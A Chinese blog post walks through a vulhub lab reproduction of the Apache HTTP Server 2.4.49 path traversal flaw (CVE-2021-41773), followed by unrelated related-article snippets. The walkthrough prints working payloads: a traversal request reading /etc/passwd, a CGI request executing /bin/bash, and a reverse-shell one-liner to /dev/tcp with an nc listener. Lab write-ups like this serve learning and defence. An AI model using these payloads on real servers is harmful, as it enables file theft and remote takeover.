Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773)

news2024/12/25 1:23:11

Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773)

文章目录

      • Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773)
      • 1 在线漏洞解读:
      • 2 环境搭建
      • 3 影响版本:
      • 4 漏洞复现
        • 4.1 执行漏洞核心指令
        • 4.2 进行访问使用bp抓包
        • 4.3 尝试执行指令
        • 4.4 反弹shenll成功

1 在线漏洞解读:

https://vulhub.org/#/environments/httpd/CVE-2021-41773/

在这里插入图片描述

2 环境搭建

cd /home/kali/vulhub/httpd/CVE-2021-41773

在这里插入图片描述

启动:

sudo docker-compose up -d

sudo docker ps -a

已启动:访问端口8087

在这里插入图片描述

3 影响版本:

在ApacheHTTPServer 2.4.49中对路径规范化的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将url映射到预期文档根目录之外的文件。
如果这些目录之外的文件没有受到通常的默认配置“要求所有拒绝”的保护,这些请求可以成功。如果还为这些别名路径启用了CGI脚本,则可以允许远程代码。

4 漏洞复现

4.1 执行漏洞核心指令

一个简单的CURL命令来重现漏洞(注意/icons/必须是一个已经存在的目录):

curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
4.2 进行访问使用bp抓包

访问http://192.168.225.166:8087/

在这里插入图片描述
.

bp包转到repeate,转发返回passwd信息

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

在这里插入图片描述

在这里插入图片描述

4.3 尝试执行指令
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash 

echo;id

/cgi-bin/ 是一个常见的目录,它通常用于存放可以通过网络服务器执行的脚本。CGI(通用网关接口)是一种技术,允许在服务器上运行脚本来生成动态内容。当客户端请求一个CGI脚本时,服务器将执行该脚本并返回结果给客户端。

在给出的示例中,/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash 是一个路径,以反斜杠分隔不同的目录。%2e 是URL编码中表示"…/"的方式,代表上一级目录。因此,该路径尝试在服务器上执行 /bin/bash 这个脚本文件,会返回bash的交互式命令行界面。

在这里插入图片描述

4.4 反弹shenll成功
bash -i &> /dev/tcp/192.168.225.166/6666 0<&1 # 反弹交互指令tcp服务
nc -lvp 6666 # l是监听模式;v是显示详细信息;p是指定端口;

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1038776.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

039:vue中数字货币化快速显示

第039个 查看专栏目录: VUE ------ element UI 专栏目标 在vue和element UI联合技术栈的操控下&#xff0c;本专栏提供行之有效的源代码示例和信息点介绍&#xff0c;做到灵活运用。 &#xff08;1&#xff09;提供vue2的一些基本操作&#xff1a;安装、引用&#xff0c;模板使…

Python程序设计实例 | 爬取机场航班信息

案例中将展示机场官网中航班信息(如机场航班的离港与进港信息)的爬取过程。有兴趣的读者可以在本案例的基础上对数据进一步分析&#xff0c;或是对爬虫做进一步的开发&#xff0c;增加更多功能。 请求、解析、处理数据是通用爬虫的三个步骤&#xff0c;在本案例中&#xff0c;…

一文了解什么SEO

搜索引擎优化 (SEO) 是一门让页面在 Google 等搜索引擎中排名更高的艺术和科学。 一、搜索引擎优化的好处 搜索引擎优化是在线营销的关键部分&#xff0c;因为搜索是用户浏览网络的主要方式之一。 搜索结果以有序列表的形式呈现&#xff0c;网站在该列表中的排名越高&#x…

一个含不少免费额度和数据下载的IP地址来源查询工具

大家好&#xff0c;我是TJ君&#xff01; 如今在国内运营的各种互联网应用都有接入IP来源显示的要求&#xff0c;现在相关API的供应商也很多。今天TJ刚好看到一个不错的&#xff0c;所以马上给大家推荐一下。 这款不错的产品名称为&#xff1a;IPInfo 产品特性 该IP查询工具…

解决 react 项目启动端口冲突

报错信息&#xff1a; Emitted error event on Server instance at:at emitErrorNT (net.js:1358:8)at processTicksAndRejections (internal/process/task_queues.js:82:21) {code: EADDRINUSE,errno: -4091,syscall: listen,address: 0.0.0.0,port: 8070 }解决方法&#xff…

第二证券:美国政府又要“关门”?3万亿市值蒸发!

上星期&#xff0c;欧美股市全线跌落&#xff0c;科技股大跌&#xff0c;纳斯达克指数跌逾3%&#xff0c;苹果、微软、谷歌、亚马逊、英伟达、特斯拉、脸书母公司Meta等七大科技股上星期市值算计削减4615亿美元&#xff08;合人民币3.37万亿元&#xff09;。 本周市场将发布我…

查看吾托帮88.47的docker里的tomcat日志

步骤如下 &#xff08;1&#xff09;ssh &#xff08;2&#xff09;ssh root192.168.88.47 等待输入密码&#xff1a;fytest &#xff08;3&#xff09;pwd #注释&#xff1a;输出/root &#xff08;4&#xff09;docker exec -it wetoband_deploy /bin/bash #注释&#xff1…

jmeterbeanshell调用jsonpath获取对应值

1.jmeter 新建线程组、Java Request、BeanShell Assertion、View Results Tree 2、在BeanShell Assertion中贴入代码&#xff1a; import org.apache.jmeter.extractor.json.jsonpath.JSONManager; import java.util.List; JSONManager js new JSONManager(); String jsonStr…

Vuex命名空间及如何获取根模块、兄弟模块状态管理器

模块化思想 import global from ./modules/global; import form from ./modules/form; import formDesign from ./modules/form-design; ...const store new Vuex.Store({state: {},mutations: {},actions: {},strict: true,modules: {global,form,formDesign,...},... } 此时…

现场直击|亚数TrustAsia精彩亮相IOTE深圳物联网展,CSA联盟展台等你来!

2023年9月20日&#xff0c;IOTE 2023第二十届深圳国际物联网展在深圳国际会展中心&#xff08;宝安&#xff09;顺利开幕。作为物联网领域年度最重要的行业盛会之一&#xff0c;本次展会汇聚全球来自工业、物流、基建、智慧城市、智慧零售等领域的600企业、10万行业人士&#x…

springboot 获取参数

1.获取简单参数 2.实体对象参数

软考高级+系统架构设计师教程+第二版新版+电子版pdf

注意&#xff01;&#xff01;&#xff01; 系统架构设计师出新版教程啦&#xff0c;2022年11月出版。所以今年下半年是新版第一次考试&#xff0c;不要再复习老版教程了&#xff0c;内容改动挺大的。 【内容简介】系统架构设计师教程&#xff08;第2版&#xff09;作为全国计…

RuntimeException

1.介绍 说明&#xff1a;RuntimeException是一个运行时异常类&#xff0c;通常用于处理程序运行时发生的异常&#xff0c;例如空指针异常、数组越界异常等。运行时异常类是在程序中出现这类异常时&#xff0c;即使没有try...catch语句捕获异常或使用throws关键字声明抛出异常&…

漫谈:C语言 C++ 左值、右值、类型转换

编程不是自然语言&#xff0c;编程自有其内在逻辑。 左值引起的BUG 编译器经常给出类似这样的BUG提示&#xff1a; “表达式必须是可修改的左值” “非常量引用的初始值必须是左值” 看一下示例&#xff1a; #include <iostream>void f(int& x) {} int main() {sho…

激活函数总结(四十一):激活函数补充(ShiLU、ReLUN)

激活函数总结&#xff08;四十一&#xff09;&#xff1a;激活函数补充 1 引言2 激活函数2.1 ShiLU激活函数2.2 ReLUN激活函数 3. 总结 1 引言 在前面的文章中已经介绍了介绍了一系列激活函数 (Sigmoid、Tanh、ReLU、Leaky ReLU、PReLU、Swish、ELU、SELU、GELU、Softmax、Sof…

实验五 熟悉 Hive 的基本操作

实验环境&#xff1a; 1.操作系统&#xff1a;CentOS 7。 2.Hadoop 版本&#xff1a;3.3.0。 3.Hive 版本&#xff1a;3.1.2。 4.JDK 版本&#xff1a;1.8。 实验内容与完成情况&#xff1a; &#xff08;1&#xff09;创建一个内部表 stocks&#xff0c;字段分隔符为英文逗号…

PS4 9.0 使用ESP32 自动破解器时如何保持 内/外网通讯 | PS4 9.0 ESP32 HEN with Internet

环境&#xff1a;PS49.0 ESP32 破解器 群晖 问题&#xff1a;连接到破解器无线网络后无法与内外网通讯&#xff0c;需要先golden hen后再切换无线网络 解决办法&#xff1a;修改ESP32 WIFI工作模式为WIFI 客户端模式 背景&#xff1a;当我在PS4 9.0上使用ESP32时&#xff0c;…

spingboot之devtools热部署IntelliJ IDEA 2022.2.3不生效问题,解决

目录 环境&#xff1a; 添加依赖&#xff1a; 修改idea配置&#xff1a; 步骤一&#xff1a;“command,”命令进入配置界面。勾选下面配置 步骤二&#xff1a;进入Advanced Setting设置 步骤三&#xff1a;修改启动配置 步骤四&#xff1a;保存 开发过程中避免不了代码…

uniapp iconfont-引用阿里巴巴矢量图标库

k-icons-font图标插件: https://ext.dcloud.net.cn/plugin?id14612 下载图标库 https://www.iconfont.cn/ 为了方便使用设置FontClass为空&#xff0c;当然不设置也可以 下载图标库 将图标可以中的&#xff1a;iconfont.css、iconfont.ttf拷贝到插件目录上"k-icons-f…

助力养殖行业数字化转型,基于深度学习模型开发构建羊脸识别系统

养殖行业的数字化进程在国内还是比较缓慢的&#xff0c;一些大厂在前面的一些探索时期做过一些相关的工作&#xff0c;但是受限于各种因素并没有能够广泛地铺展开来&#xff0c;数字化不应该被理解为非常高大上的遥不可及的东西&#xff0c;数字化也不应该成为中低产的一道鸿沟…